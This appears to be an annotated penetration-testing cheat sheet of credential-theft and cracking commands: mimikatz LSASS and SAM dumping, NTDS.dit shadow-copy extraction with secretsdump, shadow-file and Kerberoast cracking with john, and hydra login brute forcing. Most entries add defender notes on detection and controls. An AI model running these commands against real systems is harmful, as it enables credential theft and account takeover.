# Windows local credential extraction: mimikatz is given a chain of quoted
# commands (privilege::debug, token::elevate, sekurlsa::logonpasswords,
# lsadump::sam) and then exits.
# Defender view: sekurlsa::logonpasswords reads LSASS process memory, so the
# relevant controls are LSA protection (RunAsPPL), Credential Guard, and
# alerting on process-access events against lsass.exe (e.g. Sysmon event ID 10).
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
# Windows SAM dump format: user:RID:LM hash:NT hash:::
# The sample line carries no real secret. aad3b435b51404ee... is the LM hash of
# an empty value (also shown when LM storage is disabled), and 31d6cfe0... is
# the NT hash of an empty password.
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# crunch candidate-list generation: minimum and maximum length are both 11.
# Presumably models a known prefix plus two unknown characters -- confirm.
# Passwords built from a fixed phrase plus a short suffix are what a password
# policy / banned-password list should reject.
crunch 11 11 IAmNumber%%
# Copy NTDS.dit and the SYSTEM hive out of a volume shadow copy to recover the hashes.
# The live NTDS.dit is held open by the directory service, hence the shadow copy.
# Defender view: shadow-copy creation on a domain controller and reads of
# \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy* paths are high-signal events;
# alert on them in process-creation and file-access telemetry.
vssadmin.exe create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit <dest>
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM <dest>
# Recover hashes offline: secretsdump parses the copied ntds.dit together with
# the SYSTEM hive; LOCAL means no network target is contacted.
# -o hashes is presumably the output-file prefix -- confirm against the tool's help.
# The copied files and the output hold the hashes of every domain account;
# handle them as top-sensitivity secrets (encrypted storage, restricted access).
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -o hashes
unix password
# Crack a Linux shadow file.
# unshadow merges /etc/passwd and /etc/shadow into the file "hash"; john then
# runs a rockyou.txt wordlist attack against it, only if unshadow succeeded (&&).
# Reading /etc/shadow requires root. The "hash" file is created in the current
# directory with default umask permissions and contains the same password
# hashes, so it needs the same protection as /etc/shadow itself.
unshadow /etc/passwd /etc/shadow > hash && john --wordlist=/usr/share/wordlists/rockyou.txt hash
# Crack a service account (SPN) password from a Kerberos service ticket (Kerberoasting).
# A TGS must be obtained first (see domain enumeration in win_EoP.md).
# kirbi2john.py converts the exported ticket file into john's input format.
kirbi2john.py mssql.kirbi > mssql_tgs.john
# Wordlist attack using john's krb5tgs format and rockyou.txt.
# Defender view: a wordlist only succeeds against weak service-account
# passwords; long random passwords or group managed service accounts (gMSA)
# remove the risk. Service-ticket requests (Event ID 4769) with RC4 ticket
# encryption (0x17) are the usual detection signal.
john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt mssql_tgs.john
wordpress
# Online password guessing with hydra. Defender view for all three commands:
# each attempt is a real login request, so this shows up as a burst of failed
# authentications from one source; rate limiting, account lockout and MFA are
# the controls that stop it.
# wp-login: POSTs log=/pwd= pairs taken from the user list (-L) and password
# list (-P) to /wp-login.php; S=Location marks a response containing
# "Location" (the redirect after login) as a success.
hydra -L lists/usrname.txt -P lists/pass.txt <target> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
# ftp: single username (-l), password list (-P), one task at a time (-t 1), verbose output.
hydra -t 1 -l kaitlyn -P /usr/share/wordlists/wfuzz/others/common_pass.txt -vV <target> ftp
# http basic auth: GET /admin on 127.0.0.1 port 8443 (-s) as user admin with a password list.
hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -s 8443 127.0.0.1 http-get /admin -vvv
https://linuxconfig.org/test-wordpress-logins-with-hydra-on-kali-linux https://www.hackingarticles.in/multiple-ways-to-exploiting-http-authentication/